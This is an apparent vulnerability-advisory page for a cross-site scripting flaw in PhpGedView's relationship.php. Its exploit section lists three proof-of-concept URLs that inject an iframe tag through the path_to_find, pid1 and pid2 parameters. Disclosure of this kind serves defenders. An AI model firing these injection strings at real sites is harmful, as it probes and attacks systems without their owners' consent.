PhpGedView Relationship.PHP Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

PhpGedView Relationship.PHP Cross-Site Scripting Vulnerability

No exploit is required and the following proof of concepts are available:

http://www.example.com/phpgedview/relationship.php?path_to_find="><iframe>
http://www.example.com/phpgedview/relationship.php?path_to_find=0&pid1="><iframe>
http://www.example.com/phpgedview/relationship.php?path_to_find=0&pid1=&pid2="><iframe>